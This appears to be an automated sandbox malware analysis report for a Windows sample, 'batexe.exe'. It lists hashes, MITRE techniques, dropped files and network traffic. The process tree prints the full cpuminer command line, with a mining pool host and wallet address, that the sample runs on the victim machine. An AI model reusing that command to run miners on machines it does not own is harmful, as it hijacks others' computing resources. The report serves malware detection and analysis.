73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 05:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2656	b2e.exe
3828	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3828	cpuminer-sse2.exe
3828	cpuminer-sse2.exe
3828	cpuminer-sse2.exe
3828	cpuminer-sse2.exe
3828	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1060-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1060 wrote to memory of 2656	1060	batexe.exe	85
PID 1060 wrote to memory of 2656	1060	batexe.exe	85
PID 1060 wrote to memory of 2656	1060	batexe.exe	85
PID 2656 wrote to memory of 2480	2656	b2e.exe	86
PID 2656 wrote to memory of 2480	2656	b2e.exe	86
PID 2656 wrote to memory of 2480	2656	b2e.exe	86
PID 2480 wrote to memory of 3828	2480	cmd.exe	89
PID 2480 wrote to memory of 3828	2480	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1060
- C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6F83.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3828

Network

DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR
DNS

136.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

136.32.126.40.in-addr.arpa

IN PTR

Response
DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

180.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

180.178.17.96.in-addr.arpa

IN PTR

Response

180.178.17.96.in-addr.arpa

IN PTR

a96-17-178-180deploystaticakamaitechnologiescom

198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

8.3kB
9.3kB
84
87
127.0.0.1:52182

cpuminer-sse2.exe
127.0.0.1:52184

cpuminer-sse2.exe

8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

146 B
147 B
2
1

DNS Request

149.220.183.52.in-addr.arpa

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

136.32.126.40.in-addr.arpa
8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

180.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

180.178.17.96.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe

Filesize
873KB

MD5
7a461b01606f5837aa69b2ff27717666

SHA1
43666b4ade3a5f1d01d983a5b645d8f1c26995ed

SHA256
96ae825af48d66f0c5adfde4155015b71ba529be741d5a722945b0c52baa1d0a

SHA512
52864a236ecb01102ae013180acc052a10475ea26ffa5b0ca37ddd25fc6cec462b8d5575c069ff8eff6d153d15fd54ebcc2a94d65585ffd46e0aa0b3f6e86631

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe

Filesize
1.7MB

MD5
fa7fa8fbd175629465a9e9b0c8652df5

SHA1
64e9459b5135fe7096985d9800ee9ed3c310f09b

SHA256
1be6a165906e8b2f3b4f1b5b5eb208cfe87b69384a00d2e9344b7ab8c720598f

SHA512
87e37164e9bb230705aef17d4e92ab867f79b680e0d0d45f3e1454994ec490d9dc19410cdccecb24acb182aaa121fcd41f5c7b64ec547aa507720db9e42c05e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\6C56.tmp\b2e.exe

Filesize
1.4MB

MD5
2e68b9e38435d7bfa028bd2bb08e174a

SHA1
978ca8a647ce45ee04bf3eb8b2578e9567c642a4

SHA256
9bd0055d55bf3bad5c734bb52b6a0a17c6e678d3787c458a83dcff7414f6257e

SHA512
40fbd428e609938dba637fa212c4a78bd92c97a60f2609d568b2e20684abe1b77636f2c63da41b7f056615e0eb5dbc7814eb210491de264c74758a6e6c440e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6F83.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
639KB

MD5
a531f890d904d4003a36f58a15aef630

SHA1
b0d5e6913d1265cf59c2bb8129e5c6f84b52e76c

SHA256
eac199913dec6b7805a07c5dd480c6e48782777c9239521be342625d68873679

SHA512
da46ed756b80ad4f7d733a8dc98f1e37d7277c264ff14205cf8ca89791f3e6467dd746b1aba8993d209d6e6d7c8ffa2328950f01209fc545a1f013726b30a0a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
512KB

MD5
a879c5fd4613dca566d5b1a782690dd5

SHA1
41c6063b0f0dee953e99713a5326856b55e08366

SHA256
3ee76359d6802a8fe11c5b144e18ffd3833bc7b49d66f190621d41e41ea0fc20

SHA512
e20f8f40822ca215c75767b8d4102583cfb3812c74dbc064a8619f214c164ab94da6bee0ae42c794a0af1847ff30c295b34d3015f87bfe597dba80339871ea96

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
524KB

MD5
4e0f26eafedb15fc88dc41879f0fe0e8

SHA1
79338896aa38cbf8e2dfd5cf624ee6e17ecb29fe

SHA256
8e1608cd5356b7b56662f28f7ac82381032fce4ecb7ae6dcfaa845c0f31d93d6

SHA512
e3ea934934b2b3c1bffc5d0d5c504062ea169a01052f8cd80e264e02edefee8bcd1bed9ba1064f3b62bd1fa8a1ed7ac2294f262dc534af4a4ab49999b947690f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
624KB

MD5
8bf340ef58a60181d44f590ec78179cb

SHA1
b177ec63b69af8c0e6b23b624ff6d4529c9d54bc

SHA256
41f27bf7b56d2f1eb560a68f2ae0fbdcd3cec4f3bcd7c4717fbb9e3f50d61b5f

SHA512
c8370ef5304436e3f81620091759741db22c7c6df3b681593d2cfaeacbb9ad7ad10370323025f6e936817902c121041cd4ab0ea7e0c760f248f349e957e7f1df

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
695KB

MD5
17493ac6ba1c106a136b14fa8e2e3625

SHA1
2ea854de006d515db206f6eaa3d11ee9ac4d0e1c

SHA256
c143785e2de43d2d6b02980dd1c7b5348e7753bdc850aab3c43310ff3170fe9c

SHA512
0d2475eaf031182f6c14df0867df7821c1b6b30c5b833c552a760e1d65c0251377609eb4c0fa5b25a08b452bae82d1e6c16c351cb4998f181e72cca15dfbe25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
675KB

MD5
94a190cb0706234627d427a3db712def

SHA1
ba369fdd41c3eec1bea55c01d4f00bb5b373b14e

SHA256
099a90e50dad70810c1e5d91a28566b8e3fa905330019b3accdcd12b7f1c597b

SHA512
5078188c70e10475d4f119c77142e98d5c790ea2352fd4207d5ed995f2dcd8919882076549b8a6bd804551a6522e00bba3f3c059158795176fb8fba37d415211

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
509KB

MD5
c975517f718f1ae2e795eff121b15fdc

SHA1
b8065243727e10cdf4b28b87f1174f12f67466d2

SHA256
bc249ea1df79cac6498ba4d988b40b1525adfd961d776efe2a271701574845af

SHA512
775658f0516851f2b34e5a752f2f5f16dc1c445f9b6e975f1743d57b79998e08476ddd95805104f8d61c92b16ad1aae10727020573754f01a425905ad4c76864

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
271KB

MD5
b9d06977e2c1dfe9349b15b1b9ef44d6

SHA1
0d2846c917fad3e8f0140faaf3b80524c64e4c80

SHA256
532fecd5f9adc9ed42d7623cce15f59a45e849a54272509629a4463bf87a896b

SHA512
6dd4f83813cd5388adfaa58f5fa3ac8e3321d498d8f3671722ec7c80698f493f03b04a2e1d7c0e598049e91943a2bb3332c19453f4b7fecf2ca1defe9d9b0716

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
489KB

MD5
fa01a29a3fed4ef9848cc7c0c3a8e9c0

SHA1
faf60c55ecc7adecdf018a946dc7485d1c9ac5bf

SHA256
0f9366cdc0f0d7407aceca75467fd2b8c3e293fbe09ee4a257e1673b804ee42f

SHA512
24655a40f433f970904fcc2d8de2194a57b8e3d4b770c3c50e4b5039d578ab4bf2d4ef03e2ff7497da379435c8d215fb3cdbc4482d0b38bdbf737da6f374b3a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
561KB

MD5
c645961eae774edb3a7101b95b4c7073

SHA1
45ed51e20475c1e1d4a474debf3d7dcab7c27953

SHA256
3711187b4ebb65f28e5d5daff402dbadb2f2f38cc32c4b964d3311a92ac4110d

SHA512
955fe3aae97516f2a9096ddf75a9ee8398220493bce1fece56fcd6fcf9cd57941929b56922882cbd95675572b72c0a55d524b800782f1e2348494686d9058858

Download Submit
memory/1060-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2656-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2656-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3828-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3828-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/3828-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3828-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-46-0x0000000058AD0000-0x0000000058B68000-memory.dmp

Filesize
608KB

Download
memory/3828-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3828-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.